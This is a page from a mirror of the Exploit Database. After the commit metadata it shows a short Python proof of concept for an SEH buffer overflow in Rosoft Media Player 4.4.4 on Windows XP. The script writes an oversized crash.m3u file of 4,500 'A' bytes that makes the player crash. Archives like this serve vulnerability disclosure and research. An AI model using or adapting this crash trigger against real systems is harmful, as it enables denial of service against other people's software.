exploit-db-mirror/exploits/windows/dos/14601.py
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

14 lines
No EOL
304 B
Python
Executable file

#rosoft media player 4.4.4 SEH buffer overflow POC
#vulnerble application link http://download.cnet.com/Rosoft-Media-Player/3000-2139_4-10044022.html
#tested on XP SP2
#!/usr/bin/python
filename = "crash.m3u"
junk = "\x41" * 4500
textfile = open(filename , 'w')
textfile.write(junk)
textfile.close()